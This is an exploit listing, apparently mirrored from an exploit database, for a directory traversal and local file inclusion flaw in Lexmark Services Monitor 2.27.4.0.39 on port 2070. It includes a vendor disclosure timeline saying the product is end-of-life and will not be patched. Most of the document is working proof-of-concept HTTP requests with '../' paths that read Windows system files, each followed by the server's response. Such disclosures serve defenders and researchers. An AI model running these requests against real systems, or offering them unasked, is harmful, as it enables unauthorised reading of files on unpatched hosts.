Share
## https://sploitus.com/exploit?id=PACKETSTORM:155365
# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal  
# Google Dork: N/Aโ€‹  
# Date: 2019โ€‹-11-15  
# Exploit Author: Kevin Randallโ€‹  
# Vendor Homepage: https://www.lexmark.com/en_us.htmlโ€‹  
# Software Link: https://www.lexmark.com/en_us.htmlโ€‹  
# Version: 2.27.4.0.39 (Latest Version)โ€‹  
# Tested on: Windows Server 2012โ€‹  
# CVE : N/A  
โ€‹  
โ€‹  
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.โ€‹  
โ€‹  
Timeline:โ€‹  
Discovered on: 9/24/2019โ€‹  
Vendor Notified: 9/24/2019โ€‹  
Vendor Confirmed Receipt of Vulnerability: 9/24/2019โ€‹  
Follow up with Vendor: 9/25/2019โ€‹  
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019โ€‹  
Vendor Confirmed Vulnerability is Valid: 9/26/2019โ€‹  
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019โ€‹  
Vendor Confirmed Signoff to Disclose: 9/27/2019โ€‹  
Final Email Sent: 9/27/2019โ€‹  
Public Disclosure: 11/15/2019โ€‹  
โ€‹  
PoC:โ€‹  
โ€‹  
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1โ€‹  
TE: deflate,gzip;q=0.3โ€‹  
Connection: TE, closeโ€‹  
Host: 10.200.15.70:2070โ€‹  
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20โ€‹  
โ€‹  
HTTP/1.0 200 OKโ€‹  
Server: rXpressโ€‹  
Content-Length: 848536โ€‹  
โ€‹  
โ€‹  
.โ€‹  
.โ€‹  
.โ€‹  
.[.P.e.r.f.l.i.b.].โ€‹  
.โ€‹  
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.โ€‹  
.โ€‹  
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.โ€‹  
.โ€‹  
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.โ€‹  
.โ€‹  
.โ€‹  
.โ€‹  
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].โ€‹  
.โ€‹  
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.โ€‹  
.โ€‹  
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.โ€‹  
.โ€‹  
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.โ€‹  
.โ€‹  
.L.a.s.t. .H.e.l.p.=.5.0.4.1.โ€‹  
.โ€‹  
.โ€‹  
.โ€‹  
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].โ€‹  
.โ€‹  
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.โ€‹  
โ€‹  
โ€‹  
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1โ€‹  
TE: deflate,gzip;q=0.3โ€‹  
Connection: TE, closeโ€‹  
Host: 10.200.15.70:2070โ€‹  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3โ€‹  
โ€‹  
HTTP/1.0 200 OKโ€‹  
Server: rXpressโ€‹  
Content-Length: 38710โ€‹  
โ€‹  
..[.S.t.r.i.n.g.s.].โ€‹  
.โ€‹  
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".โ€‹  
.โ€‹  
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".โ€‹  
.โ€‹  
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".โ€‹  
.โ€‹  
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".โ€‹  
.โ€‹  
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".โ€‹  
.โ€‹  
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".โ€‹  
.โ€‹  
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".โ€‹  
.โ€‹  
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".โ€‹  
.โ€‹  
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".โ€‹  
.โ€‹  
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".โ€‹  
.โ€‹  
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".โ€‹  
โ€‹  
โ€‹  
โ€‹  
โ€‹  
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1โ€‹  
TE: deflate,gzip;q=0.3โ€‹  
Connection: TE, closeโ€‹  
Host: 10.200.15.70:2070โ€‹  
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)โ€‹  
โ€‹  
HTTP/1.0 200 OKโ€‹  
Server: rXpressโ€‹  
Content-Length: 17463โ€‹  
โ€‹  
# Copyright (c) 1993-2004 Microsoft Corp.โ€‹  
#โ€‹  
# This file contains port numbers for well-known services defined by IANAโ€‹  
#โ€‹  
# Format:โ€‹  
#โ€‹  
# <service name> <port number>/<protocol> [aliases...] [#<comment>]โ€‹  
#โ€‹  
โ€‹  
echo 7/tcpโ€‹  
echo 7/udpโ€‹  
discard 9/tcp sink nullโ€‹  
discard 9/udp sink nullโ€‹  
systat 11/tcp users #Active usersโ€‹  
systat 11/udp users #Active usersโ€‹  
daytime 13/tcpโ€‹  
daytime 13/udpโ€‹  
qotd 17/tcp quote #Quote of the dayโ€‹  
qotd 17/udp quote #Quote of the dayโ€‹  
chargen 19/tcp ttytst source #Character generatorโ€‹  
chargen 19/udp ttytst source #Character generatorโ€‹  
ftp-data 20/tcp #FTP, dataโ€‹  
ftp 21/tcp #FTP. controlโ€‹  
ssh 22/tcp #SSH Remote Login Protocolโ€‹  
telnet 23/tcpโ€‹  
smtp 25/tcp mail #Simple Mail Transfer Protocolโ€‹  
time 37/tcp timserver